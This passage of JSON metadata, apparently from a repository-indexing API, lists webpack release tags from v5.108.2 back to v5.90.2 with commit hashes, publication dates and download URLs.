itHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e